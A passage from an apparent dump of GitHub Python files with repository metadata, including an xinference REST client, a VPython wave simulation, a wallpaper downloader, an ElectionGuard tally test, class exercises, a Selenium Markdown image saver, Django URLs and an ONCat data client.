Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/chat/completions\"\n\n if chat_history is None:\n chat_history = []\n\n chat_history.append({\"role\": \"user\", \"content\": prompt})\n\n request_body: Dict[str, Any] = {\n \"model\": self._model_uid,\n \"messages\": chat_history,\n }\n\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n response = requests.post(url, json=request_body, stream=stream)\n\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate chat completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return chat_streaming_response_iterator(\n response.iter_content(chunk_size=None)\n )\n\n response_data = response.json()\n return response_data\n\n\nclass Client:\n def __init__(self, base_url):\n self.base_url = base_url\n\n @classmethod\n def _gen_model_uid(cls) -> str:\n # generate a time-based uuid.\n return str(uuid.uuid1())\n\n def list_models(self) -> Dict[str, Dict[str, Any]]:\n \"\"\"\n Retrieve the model specifications from the Server.\n\n Returns\n -------\n Dict[str, Dict[str, Any]]\n The collection of model specifications with their names on the server.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models\"\n\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def launch_model(\n self,\n model_name: str,\n model_type: str = \"LLM\",\n model_uid: Optional[str] = None,\n model_size_in_billions: Optional[int] = None,\n model_format: Optional[str] = None,\n quantization: Optional[str] = None,\n replica: int = 1,\n n_gpu: Optional[Union[int, str]] = \"auto\",\n **kwargs,\n ) -> str:\n \"\"\"\n Launch the model based on the parameters on the server via RESTful APIs.\n\n Parameters\n ----------\n model_name: str\n The name of model.\n model_type: str\n type of model.\n model_uid: str\n UID of model, auto generate a UUID if is None.\n model_size_in_billions: Optional[int]\n The size (in billions) of the model.\n model_format: Optional[str]\n The format of the model.\n quantization: Optional[str]\n The quantization of model.\n replica: Optional[int]\n The replica of model, default is 1.\n n_gpu: Optional[Union[int, str]],\n The number of GPUs used by the model, default is \"auto\".\n ``n_gpu=None`` means cpu only, ``n_gpu=auto`` lets the system automatically determine the best number of GPUs to use.\n **kwargs:\n Any other parameters been specified.\n\n Returns\n -------\n str\n The unique model_uid for the launched model.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models\"\n\n if model_uid is None:\n model_uid = self._gen_model_uid()\n\n payload = {\n \"model_uid\": model_uid,\n \"model_name\": model_name,\n \"model_type\": model_type,\n \"model_size_in_billions\": model_size_in_billions,\n \"model_format\": model_format,\n \"quantization\": quantization,\n \"replica\": replica,\n \"n_gpu\": n_gpu,\n }\n\n for key, value in kwargs.items():\n payload[str(key)] = value\n\n response = requests.post(url, json=payload)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to launch model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data[\"model_uid\"]\n\n def terminate_model(self, model_uid: str):\n \"\"\"\n Terminate the specific model running 
on the server.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model we want.\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n\n response = requests.delete(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to terminate model, detail: {response.json()['detail']}\"\n )\n\n def _get_supervisor_internal_address(self):\n url = f\"{self.base_url}/v1/address\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(f\"Failed to get supervisor internal address\")\n response_data = response.json()\n return response_data\n\n def get_model(self, model_uid: str) -> RESTfulModelHandle:\n \"\"\"\n Launch the model based on the parameters on the server via RESTful APIs.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model.\n\n Returns\n -------\n ModelHandle\n The corresponding Model Handler based on the Model specified in the uid:\n \"RESTfulChatglmCppChatModelHandle\" -> provide handle to ChatGLM Model\n \"RESTfulGenerateModelHandle\" -> provide handle to basic generate Model. e.g. Baichuan.\n \"RESTfulChatModelHandle\" -> provide handle to chat Model. e.g. Baichuan-chat.\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to get the model description, detail: {response.json()['detail']}\"\n )\n desc = response.json()\n\n if desc[\"model_type\"] == \"LLM\":\n if desc[\"model_format\"] == \"ggmlv3\" and \"chatglm\" in desc[\"model_name\"]:\n return RESTfulChatglmCppChatModelHandle(model_uid, self.base_url)\n elif \"chat\" in desc[\"model_ability\"]:\n return RESTfulChatModelHandle(model_uid, self.base_url)\n elif \"generate\" in desc[\"model_ability\"]:\n return RESTfulGenerateModelHandle(model_uid, self.base_url)\n else:\n raise ValueError(f\"Unrecognized model ability: {desc['model_ability']}\")\n elif desc[\"model_type\"] == \"embedding\":\n return RESTfulEmbeddingModelHandle(model_uid, self.base_url)\n elif desc[\"model_type\"] == \"image\":\n return RESTfulImageModelHandle(model_uid, self.base_url)\n else:\n raise ValueError(f\"Unknown model type:{desc['model_type']}\")\n\n def describe_model(self, model_uid: str):\n \"\"\"\n Get model information via RESTful APIs.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model.\n\n Returns\n -------\n dict\n A dictionary containing the following keys:\n - \"model_type\": str\n the type of the model determined by its function, e.g. 
\"LLM\" (Large Language Model)\n - \"model_name\": str\n the name of the specific LLM model family\n - \"model_lang\": List[str]\n the languages supported by the LLM model\n - \"model_ability\": List[str]\n the ability or capabilities of the LLM model\n - \"model_description\": str\n a detailed description of the LLM model\n - \"model_format\": str\n the format specification of the LLM model\n - \"model_size_in_billions\": int\n the size of the LLM model in billions\n - \"quantization\": str\n the quantization applied to the model\n - \"revision\": str\n the revision number of the LLM model specification\n - \"context_length\": int\n the maximum text length the LLM model can accommodate (include all input & output)\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to get the model description, detail: {response.json()['detail']}\"\n )\n return response.json()\n\n def register_model(self, model_type: str, model: str, persist: bool):\n \"\"\"\n Register a custom model.\n\n Parameters\n ----------\n model_type: str\n The type of model.\n model: str\n The model definition. (refer to: https://inference.readthedocs.io/en/latest/models/custom.html)\n persist: bool\n\n\n Raises\n ------\n RuntimeError\n Report failure to register the custom model. Provide details of failure through error message.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}\"\n request_body = {\"model\": model, \"persist\": persist}\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to register model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def unregister_model(self, model_type: str, model_name: str):\n \"\"\"\n Unregister a custom model.\n\n Parameters\n ----------\n model_type: str\n The type of model.\n model_name: str\n The name of the model\n\n Raises\n ------\n RuntimeError\n Report failure to unregister the custom model. Provide details of failure through error message.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}/{model_name}\"\n response = requests.delete(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to register model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def list_model_registrations(self, model_type: str) -> List[Dict[str, Any]]:\n \"\"\"\n List models registered on the server.\n\n Parameters\n ----------\n model_type: str\n The type of the model.\n\n Returns\n -------\n List[Dict[str, Any]]\n The collection of registered models on the server.\n\n Raises\n ------\n RuntimeError\n Report failure to list model registration. 
Provide details of failure through error message.\n\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model registration, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def get_model_registration(\n self, model_type: str, model_name: str\n ) -> Dict[str, Any]:\n \"\"\"\n Get the model with the model type and model name registered on the server.\n\n Parameters\n ----------\n model_type: str\n The type of the model.\n\n model_name: str\n The name of the model.\n Returns\n -------\n List[Dict[str, Any]]\n The collection of registered models on the server.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}/{model_name}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model registration, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n","repo_name":"ReggieMiller/inference","sub_path":"xinference/client/restful/restful_client.py","file_name":"restful_client.py","file_ext":"py","file_size_in_byte":22432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"74411134628","text":"################\n#Interference #\n#Michael Malahe#\n#2006 #\n################\n\n#Instructions:\n#The leftmost and rightmost buttons cycle through the wave types coming from either direction.\n#The start/pause button is pretty self-explanatory.\n#The stop button stops the animation entirely, so you can start at the beginning again with changes.\n#When the auto/manual button is set to manual, the start/pause button becomes a frame-by-frame clicker.\n#The last parameter, globstep, should be increased on slow machines and reduced on faster ones.\n\n#Modules\nfrom __future__ import division\nfrom visual import *\nfrom visual.graph import *\nfrom visual.controls import *\nfrom math import *\n\n#Parameters\nobsloc = 0\ntlen = 20\nspeed = 1.5\nframerate = 35\ntmax = 10\nglobstep = 0.1\n\n#Constants\nt = 0\ndt = 1/framerate\n\n#Wave class\nclass wave:\n def __init__(self,function,xmin,xmax,step,pos,render):\n self.pos = pos\n self.function = function\n if render == 1:\n self.curve = []\n self.xmin = xmin\n self.xmax = xmax\n self.step = step\n for x in arange(xmin,xmax,step):\n exec(\"y=\"+function+\"(x)\")\n self.curve.append((x,y))\n lol = [(a[0]+pos[0],a[1]+pos[1]) for a in self.curve]\n lol.insert(0,(-tlen,0))\n lol.append((tlen,0))\n self.render = curve(pos=lol, radius=0.03)\n else:\n pass\n def interfere(self,wave):\n self.curve = []\n for x in arange(-tlen,tlen,self.step):\n pos1 = x-self.pos[0]\n pos2 = x-wave.pos[0]\n exec(\"y=\"+self.function+\"(pos1)\"+\"+\"+wave.function+\"(pos2)\")\n self.curve.append((x,y))\n self.render.pos = self.curve\n\n#Additional wave types\ndef triangle(x):\n if x<=-1 or x>=1:\n y = 0\n else:\n y = 1-abs(x)\n return y\n\ndef lopsided(x):\n if x<=-1 or x>=0.5:\n y = 0\n elif x >= 0:\n y = 2*(0.5-x)\n elif x<0:\n y = 1+x\n return y\n\ndef square(x):\n if x<=-1 or x>=1:\n y = 0\n else:\n y = 1\n return y\n\ndef sqsin(x):\n if x<-pi or x>pi:\n y = 0\n else:\n y = (sin(x))**2\n return y\n\ndef sqtri(x):\n if x<-2:\n y = 0\n if x<0 and x>=-2:\n y = -1\n if x>=0 and x<2:\n y = -abs(-x+1)+1\n if x>=2:\n y = 0\n return y\n\ndef sine(x):\n if x<-pi or x>pi:\n y = 0\n else:\n y = sin(x)\n return y\n\n#3d Scene\nscene = 
display(title='Pulse',\n width=1024, height=600, x=0, y=0,\n center=(obsloc,0,0), background=(0,0,0))\nscene.autoscale = 0\nscene.userspin = 0\nscene.range = (10,7,1)\nobs = curve(pos=[(obsloc,1.5),(obsloc,-1.5)], color = color.yellow, radius=0.03)\n\n#Control functions\ndef togglego():\n if ss.go == 1:\n ss.go = 0\n ss.text = \"Start\"\n elif ss.go == 0:\n ss.go = 1\n ss.text = \"Pause\"\n\ndef wfcycle(wf):\n if wf.text == \"1/2 sin\":\n wf.text = \"triangle\"\n elif wf.text == \"triangle\":\n wf.text = \"square\"\n elif wf.text == \"square\":\n wf.text = \"lopsided\"\n elif wf.text == \"lopsided\":\n wf.text = \"sine\"\n elif wf.text == \"sine\":\n wf.text = \"sqsin\"\n elif wf.text == \"sqsin\":\n wf.text = \"sqtri\"\n elif wf.text == \"sqtri\":\n wf.text = \"1/2 sin\"\n\ndef stop():\n stp.stp = 1\n\ndef autotoggle():\n if auto.text == \"Auto\":\n auto.text = \"Manual\"\n elif auto.text == \"Manual\":\n auto.text = \"Auto\"\n\n#Control scene\nc = controls(title='Controls',\n x=0, y=600, width=1024, height=150, range=50)\nss = button(pos=(-5,0), width=10, height=10,\n text='Start', action=lambda:togglego())\nwf1 = button(pos=(-15,0), width=10, height=10,\n text='sine', action=lambda:wfcycle(wf1))\nwf2 = button(pos=(25,0), width=10, height=10,\n text='sine', action=lambda:wfcycle(wf2))\nstp = button(pos=(5,0), width=10, height=10,\n text='Stop', action=lambda:stop())\nauto = button(pos=(15,0), width=10, height=10,\n text='Auto', action=lambda:autotoggle())\n\n#Main Loop:\nwhile 1:\n ss.go = 0\n stp.stp = 0\n ss.text = \"Start\"\n c.interact()\n if ss.go == 1:\n t = 0\n try:\n wave1.render.visible = 0\n wave2.render.visible = 0\n except:\n pass\n #New wave\n if wf1.text == \"1/2 sin\":\n wave1 = wave(\"sine\",0,pi,globstep,(-15,0),1)\n else:\n wave1 = wave(wf1.text,-pi,pi,globstep,(-7,0),1)\n if wf2.text == \"1/2 sin\":\n wave2 = wave(\"sine\",0,pi,globstep,(15,0),0)\n else:\n wave2 = wave(wf2.text,-pi,pi,globstep,(7,0),0)\n #Motion Loop\n while t.*?)\" target=\"_blank\"', re.S)\n\nurls = []\nphoto_urls = []\nphoto_names = []\n# 信号量,控制协程数,防止爬的过快\nsem = asyncio.Semaphore(10)\nnew_photo_count = 0\nold_photo_count = 0\n\n\ndef confirm_param():\n global originUrl\n if len(originUrl) > 30:\n originUrl += '&page='\n else:\n originUrl += '?page='\n\n\nasync def get_urls(url, page_num, session):\n print(\"开始获取第\" + str(page_num) + \"页的图片链接\")\n while True:\n async with sem:\n await asyncio.sleep(1.5)\n print('发出请求' + str(page_num) + 'url:' + url)\n try:\n async with await session.request('GET', url, headers=headers) as resp: # 提出请求\n print(resp.status)\n if resp.status == 200:\n page_content = await resp.text()\n break\n except:\n print('url:' + url + \"请求被拒绝\")\n # print(page_content)\n # 迭代器\n the_iter = com.finditer(page_content)\n for it in the_iter:\n # print(it.group(\"url\"))\n urls.append(it.group(\"url\"))\n\n\ndef get_photo_url_by_name(url_array):\n for url in url_array:\n photo_name = url.split('/')[-1]\n pre_name = photo_name[:2]\n url = f\"https://w.wallhaven.cc/full/{pre_name}/wallhaven-{photo_name}.jpg\"\n photo_urls.append(url)\n print(url)\n photo_name += '.jpg'\n photo_names.append(photo_name)\n\n\nasync def save_a_photo(photo_url, index, session):\n # print('原url'+photo_url)\n while True:\n async with sem:\n jpg_photo_name = str(photo_names[index][:-3]) + 'jpg'\n jpg_path = path + jpg_photo_name\n png_photo_name = str(photo_names[index][:-3]) + 'png'\n png_path = path + png_photo_name\n if not os.path.exists(jpg_path) and not os.path.exists(png_path):\n try:\n async with await 
session.request('GET', photo_url, headers=headers) as resp:\n if resp.status == 429:\n print(\"429请求过快\")\n continue\n print(resp.status)\n if resp.status == 404:\n photo_names[index] = str(photo_names[index][:-3]) + 'png'\n photo_url = photo_url[:-3] + 'png'\n print('修正后的url为:' + photo_url)\n try:\n async with await session.request('GET', photo_url, headers=headers) as resp2:\n photo_content = await resp2.read()\n if resp2.status == 200:\n with open(path + photo_names[index], mode='wb')as f:\n f.write(photo_content)\n print(str(index) + \":\" + str(photo_names[index]) + '保存成功')\n\n break\n except:\n print('图片保存失败:' + photo_url)\n else:\n photo_names[index] = str(photo_names[index][:-3]) + 'jpg'\n photo_content = await resp.read()\n if resp.status == 200:\n with open(path + photo_names[index], mode='wb')as f:\n f.write(photo_content)\n print(str(index) + \":\" + str(photo_names[index]) + '保存成功')\n break\n except:\n print('图片保存失败:' + photo_url)\n else:\n print(\"图片\" + photo_names[index][:-4] + \"已存在\")\n break\n\n\nasync def main_save_photo(photo_url_array):\n tasks = []\n index = 0\n async with aiohttp.ClientSession() as session:\n for url in photo_url_array:\n tasks.append(asyncio.create_task(save_a_photo(url, index, session)))\n index += 1\n await asyncio.wait(tasks)\n\n\nasync def main_get_urls(page_num):\n tasks = [] # 把所有任务放到一个列表中\n async with aiohttp.ClientSession() as session: # 获取session\n for index in range(1, page_num + 1):\n tasks.append(asyncio.create_task(get_urls(originUrl + str(index), index, session)))\n print(len(tasks))\n await asyncio.wait(tasks) # 激活协程\n\n\nif __name__ == '__main__':\n confirm_param()\n print(max_page)\n loop = asyncio.get_event_loop() # 获取事件循环\n loop.run_until_complete(main_get_urls(max_page)) # 激活协程\n print(urls)\n print(len(urls))\n get_photo_url_by_name(urls)\n loop = asyncio.get_event_loop() # 获取事件循环\n loop.run_until_complete(main_save_photo(photo_urls)) # 激活协程\n","repo_name":"KallenBlue/wallheaven_downloader","sub_path":"wallheaven_downloader.py","file_name":"wallheaven_downloader.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"72897512551","text":"from datetime import timedelta\nfrom typing import Dict\n\nfrom electionguard.ballot import (\n BallotBoxState,\n SubmittedBallot,\n from_ciphertext_ballot,\n)\nfrom electionguard.data_store import DataStore\n\nfrom electionguard.encrypt import encrypt_ballot\nfrom electionguard.group import ElementModQ, ONE_MOD_Q\nfrom electionguard.tally import CiphertextTally, tally_ballots, tally_ballot\n\n\nfrom electionguard_tools.strategies.election import (\n elections_and_ballots,\n ELECTIONS_AND_BALLOTS_TUPLE_TYPE,\n)\nfrom electionguard_tools.factories.election_factory import ElectionFactory\nfrom electionguard_tools.helpers.tally_accumulate import accumulate_plaintext_ballots\n\nfrom electionguard.elgamal import ElGamalKeyPair\nfrom electionguard.group import (\n ElementModQ,\n TWO_MOD_P,\n ONE_MOD_Q,\n mult_p,\n g_pow_p,\n)\nfrom electionguard.manifest import InternalManifest\nfrom electionguard.election import (\n CiphertextElectionContext,\n make_ciphertext_election_context,\n)\nimport electionguard_tools.factories.ballot_factory as BallotFactory\nimport os\n\ndef _decrypt_with_secret(\n tally: CiphertextTally, secret_key: ElementModQ\n) -> Dict[str, int]:\n \"\"\"\n Demonstrates how to decrypt a tally with a known secret key\n \"\"\"\n plaintext_selections: Dict[str, int] = {}\n for _, contest in 
tally.contests.items():\n for object_id, selection in contest.selections.items():\n plaintext_tally = selection.ciphertext.decrypt(secret_key)\n plaintext_selections[object_id] = plaintext_tally\n\n return plaintext_selections\n\nexport_data_dir = os.path.join(os.path.dirname(os.getcwd()), \"tally_outputs\")\n\nelection_factory = ElectionFactory()\nballot_factory = BallotFactory.BallotFactory()\nkeypair = ElGamalKeyPair(TWO_MOD_P, g_pow_p(TWO_MOD_P))\n\n# set the datastore to store all the ballots\nstore = DataStore()\n\nencypted_file_dir = os.path.join(os.path.dirname(os.getcwd()), 'encrypted_data')\ngenerated_file_dir = os.path.join(os.path.dirname(os.getcwd()), 'generated_data')\nballotNum = \"127\"\nencypted_file_dir_with_ballotNum = os.path.join(encypted_file_dir, ballotNum)\ngenerated_data_dir_with_ballotNum = os.path.join(generated_file_dir, ballotNum)\nfor ballot_filename in os.listdir(encypted_file_dir_with_ballotNum):\n subject = ballot_factory.get_ciphertext_ballot_from_file(encypted_file_dir_with_ballotNum, ballot_filename)\n manifest = election_factory.get_simple_manifest_from_file_self_defined_directory(generated_data_dir_with_ballotNum, \"manifest.json\")\n internal_manifest = InternalManifest(manifest)\n context = make_ciphertext_election_context(\n number_of_guardians=1,\n quorum=1,\n elgamal_public_key=keypair.public_key,\n commitment_hash=ElementModQ(2),\n manifest_hash=manifest.crypto_hash(),\n )\n # add to the ballot store\n store.set(\n subject.object_id,\n from_ciphertext_ballot(subject, BallotBoxState.CAST),\n )\n\n# act\nresult = tally_ballots(store, internal_manifest, context)\nprint(\"ciphertext ballots length is \", result.cast())\nprint (\"tally ballot result is \", result)\ndecrypted_subject_to_export = ballot_factory.export_ballot_to_file(\n result, export_data_dir, \"tally_output\"\n)\n# self.assertIsNotNone(result)\n\n# Assert\ndecrypted_tallies = _decrypt_with_secret(result, keypair.secret_key)\nprint(\"decrypted_tally\")\nprint(decrypted_tallies)\n# self.assertEqual(plaintext_tallies, decrypted_tallies)\n\n\n\n# keypair = ElGamalKeyPair(TWO_MOD_P, g_pow_p(TWO_MOD_P))\n# secret_key = TWO_MOD_P\n# election = election_factory.get_simple_manifest_from_file()\n# internal_manifest, context = election_factory.get_fake_ciphertext_election(\n# election, keypair.public_key\n# )\n# ballots = ballot_factory.get_simple_ballots_from_file()\n#\n# # Tally the plaintext ballots for comparison later\n# plaintext_tallies = accumulate_plaintext_ballots(ballots)\n# print(\"plaintext tallies \", plaintext_tallies)\n#\n# # encrypt each ballot\n# store = DataStore()\n# encryption_seed = ElectionFactory.get_encryption_device().get_hash()\n# for ballot in ballots:\n# encrypted_ballot = encrypt_ballot(\n# ballot, internal_manifest, context, encryption_seed\n# )\n# encryption_seed = encrypted_ballot.code\n# # print(\"encrypted ballot is \", encrypted_ballot)\n# # add to the ballot store\n# store.set(\n# encrypted_ballot.object_id,\n# from_ciphertext_ballot(encrypted_ballot, BallotBoxState.CAST),\n# )\n#\n# print(\"finish encrypting all the ballots!!!!!!\")\n# export_data_dir = os.path.join(os.path.dirname(os.getcwd()), \"tally_outputs\")\n#\n# # act\n# result = tally_ballots(store, internal_manifest, context)\n# # print(\"result is \", result)\n# decrypted_subject_to_export = ballot_factory.export_ballot_to_file(\n# result, export_data_dir, \"sample_tally_result2\"\n# )\n#\n# # Assert\n# decrypted_tallies = _decrypt_with_secret(result, secret_key)\n# print(\"decrypted_tally\")\n# 
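NOTE: the commented-out section above replays the same tally flow with in-memory ballots instead of files.\n# 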
print(decrypted_tallies)","repo_name":"Xin128/ElectionGuard-COMP413","sub_path":"electionguard-python/tests/testTally.py","file_name":"testTally.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"7638967146","text":"# 5\r\nclass employee:\r\n n=int(input(\"Enter how many employees:\"))\r\n def __init__(self):\r\n for self.i in range(self.n):\r\n self.name=input(\"Enter your name:\")\r\n self.designation=input(\"Enter your designation:\")\r\n self.salary=int(input(\"Enter your salary:\"))\r\n print(\"The employee name is {} his designation is {} and his salary is {}.\".format(self.name,\r\n self.designation,\r\n self.salary))\r\n\r\n\r\ne=employee()\r\n\r\n# 6\r\n\r\nclass person:\r\n def __init__(self):\r\n self.name=input(\"Enter your name:\")\r\n self.year,self.month,self.day=map(int,input(\"Enter year month number and day with spaces:\").split())\r\n self._year,self._month,self._day=map(int,input(\"Enter year month number and day of today with spaces:\").split())\r\nclass dob(person):\r\n def vote(self):\r\n self.t_year=self._year-self.year\r\n if self.t_year>=18:\r\n print(\"Eligible\")\r\n else:\r\n print(\"Not eligible.\")\r\ndob=dob()\r\ndob.vote()\r\n# 7\r\nimport math\r\nclass circle:\r\n pi=math.pi\r\n def area(self):\r\n self.radius=int(input(\"Enter the radius:\"))\r\n self.area=self.pi*self.radius**2\r\n print(\"Area:\",self.area)\r\n def circumference(self):\r\n self.circumference=2*self.pi*self.radius\r\n print(\"circumference:\",self.circumference)\r\nc=circle()\r\nc.area()\r\nc.circumference()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"hardhik2002/iare-python","sub_path":"module-5-5 to 9.py","file_name":"module-5-5 to 9.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11894267393","text":"import os\nimport re\nimport time\nfrom urllib.parse import urlparse\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\ndef extract_image_urls_from_markdown_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n content = f.read()\n # 使用正则表达式提取图片URL\n image_urls = re.findall(r'!\\[.*?\\]\\((.*?)\\)', content)\n return image_urls\n\ndef save_images_from_markdown_directory(directory):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'\n }\n chrome_options = Options()\n # 设置Chrome浏览器有界面模式,注释掉--headless\n # chrome_options.add_argument('--headless')\n # 指定Chrome浏览器驱动程序路径,请根据实际情况进行修改\n chrome_driver_path = 'E:\\\\Program Files (x86)\\\\chromedriver_win32\\\\chromedriver.exe' # 将路径替换为实际的驱动程序路径\n\n for root, dirs, files in os.walk(directory):\n for file in files:\n if file.endswith('.md'):\n file_path = os.path.join(root, file)\n image_urls = extract_image_urls_from_markdown_file(file_path)\n image_dir = os.path.join(root, 'images')\n os.makedirs(image_dir, exist_ok=True) # 创建保存图片的目录\n\n # 读取文件内容\n with open(file_path, 'r', encoding='utf-8') as f:\n content = f.read()\n\n # 创建浏览器实例\n driver = webdriver.Chrome(chrome_driver_path, options=chrome_options)\n\n for url in image_urls:\n # 检查URL是否以http://或https://开头\n if url.startswith('http://') or url.startswith('https://'):\n try:\n # 使用Selenium打开网页\n driver.get(url)\n time.sleep(2) # 等待页面加载完成,可根据实际情况调整等待时间\n\n # 获取图片元素\n img_element = driver.find_element_by_tag_name('img')\n\n # 
获取图片URL\n image_url = img_element.get_attribute('src')\n\n # 下载图片\n response = requests.get(image_url, headers=headers)\n if response.status_code == 200:\n filename = os.path.basename(urlparse(image_url).path)\n save_path = os.path.join(image_dir, filename)\n with open(save_path, 'wb') as f:\n f.write(response.content)\n print(f'Saved image: {save_path}')\n # 替换Markdown文档中的URL为相对路径\n relative_path = os.path.relpath(save_path, os.path.dirname(file_path))\n content = content.replace(url, relative_path.replace(\"\\\\\", \"/\"))\n print(f'Replaced URL in Markdown: {url} -> {relative_path}')\n time.sleep(5) # 添加1秒的延迟\n else:\n print(f'Error downloading image: {url} - HTTP status code: {response.status_code}')\n except Exception as e:\n print(f'Error downloading image: {url}')\n print(e)\n\n # 关闭浏览器\n driver.quit()\n\n # 将修改后的内容写回文件\n with open(file_path, 'w', encoding='utf-8') as f:\n f.write(content)\n\n# 设置Markdown文档所在的目录\nmarkdown_directory = './docs/七政四餘星盤 天星擇日 占星盤 - Moira/'\n\nsave_images_from_markdown_directory(markdown_directory)\n","repo_name":"xiwangly2/moira","sub_path":"scripts/selenium图片处理.py","file_name":"selenium图片处理.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"675350521","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n # sessions\n path('login/', views.LoginView.as_view(), name='login'),\n path('logout/', views.LogoutView.as_view(), name='logout'),\n\n # register\n path('register/', views.RegisterView.as_view(), name='register'),\n path('register/success/',views.RegisterSuccessView.as_view(), name='register-success'),\n\n]\n","repo_name":"hcosta/django-easyregistration","sub_path":"registration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"3558255795","text":"import logging\nfrom pprint import pformat, pprint\nfrom django.conf import settings\nfrom .rest import RESTInterface\n\n'''\n\nThis file only ommunicates with the oncat.\nThe data is return RAW from ONCat\n\nThe PAI documentation is here:\nhttps://oncat.ornl.gov/doc\n\nFor future see this:\nhttp://requests-oauthlib.readthedocs.io/en/latest/oauth2_workflow.html#legacy-application-flow\n\n'''\nlogger = logging.getLogger(__name__)\n\n\nclass ONCat(RESTInterface):\n '''\n Base class for the ONCat requests\n It shouldn't be instantiated\n '''\n def __init__(self, request):\n super().__init__(\n url_prefix=settings.ONCAT_URL,\n request=request,\n http_method='get',\n )\n\n def experiments(self, facility, instrument):\n '''\n '''\n logger.debug(\"func experiments for %s and %s.\",\n facility, instrument)\n params_json = {\n 'facility': facility,\n 'instrument': instrument,\n 'projection': ['tags', 'name', 'title', 'exts',\n 'size', 'latest', 'users'],\n }\n return self._request(\"/experiments\", params_json)\n\n def runs(self, params_json):\n '''\n\n '''\n # logger.debug(\"func runs:\\n%s\", pformat(params_json))\n result = self._request(\"/datafiles\", params_json=params_json)\n if result is not None and len(result) > 0:\n return result\n else:\n return []\n\n def run(self, facility, instrument, ipts, file_location):\n '''\n '''\n logger.debug(\"func runs for %s %s and %s: %s\",\n facility, instrument, ipts, file_location)\n\n params_json = {\n 'facility': facility,\n 'instrument': instrument,\n 'experiment': ipts,\n }\n return 
self._request(\"/datafiles{}\".format(file_location),\n params_json=params_json)\n\n\nclass HFIR(ONCat):\n\n # different instruments have different file types (TAS has .dat)\n RUNS_EXTENSIONS = {\n 'DEFAULT': ['.xml'],\n 'CG4C': ['.dat'],\n 'HB1': ['.dat'],\n 'HB1A': ['.dat'],\n 'HB3': ['.dat'],\n }\n\n def __init__(self, request):\n super().__init__(request)\n self.facility = 'HFIR'\n\n def experiments(self, instrument):\n return super().experiments(self.facility, instrument)\n\n def runs(self, instrument, ipts, exp, projection, extensions):\n \n params_json = {\n 'facility': self.facility,\n 'instrument': instrument,\n 'experiment': ipts,\n 'tags': ['spice/{}'.format(exp)],\n 'exts': extensions,\n 'projection': projection,\n }\n return super().runs(params_json)\n\n def run(self, instrument, ipts, file_location):\n return super().run(self.facility, instrument, ipts, file_location)\n\n\nclass SNS(ONCat):\n\n \n\n def __init__(self, request):\n super().__init__(request)\n self.facility = 'SNS'\n\n def experiments(self, instrument):\n '''\n @return:\n [{'id': 'IPTS-18268',\n 'name': 'IPTS-18268',\n 'tags': ['type/raw'],\n 'type': 'experiment'}, ... ]\n '''\n return super().experiments(self.facility, instrument)\n\n def runs(self, instrument, ipts, projection, extensions):\n '''\n\n '''\n params_json = {\n 'facility': self.facility,\n 'instrument': instrument,\n 